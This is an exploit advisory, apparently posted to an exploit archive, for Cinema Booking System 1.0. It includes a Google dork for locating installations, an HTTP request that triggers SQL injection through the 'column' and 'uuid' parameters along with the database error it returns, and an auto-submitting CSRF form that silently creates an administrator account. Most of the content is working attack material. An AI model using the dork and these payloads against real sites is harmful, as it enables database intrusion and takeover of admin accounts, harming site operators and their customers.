id: 39676
date: 07/09/2024
title: Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery Vulnerability
author: bRpsd
cves: 

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 .:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities

.:. Google Dorks .:.
intitle:Cinema Booking System

.:. Date: July 5, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.phpjabbers.com/
.:. Product -> https://www.phpjabbers.com/cinema-booking-system/
.:. Product Version -> 1.0
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


 #####################
 |PRODUCT DESCRIPTION|
 #####################
"The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code."






Vulnerability 1: Authenticated SQL Injection
GET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndex
Cookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952
Priority: u=1

Response:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESC
LIMIT 0, 10' at line 5




===========================================================================================
Vulnerability 2: Cross Site Request Forgery
Risk:Privilege Escalation

Proof of concept:
<h1>CSRF PoC</h1>
    <form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">
        <input type="hidden" name="user_create" value="1">
        <input type="hidden" name="role_id" value="1">
        <input type="hidden" name="email" value="test@test.com">
        <input type="hidden" name="password" value="123123">
        <input type="hidden" name="name" value="test">
        <input type="hidden" name="phone" value="">
        <input type="hidden" name="status" value="T">
    </form>
    <script type="text/javascript">
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

#  0day.today [2024-07-16]  #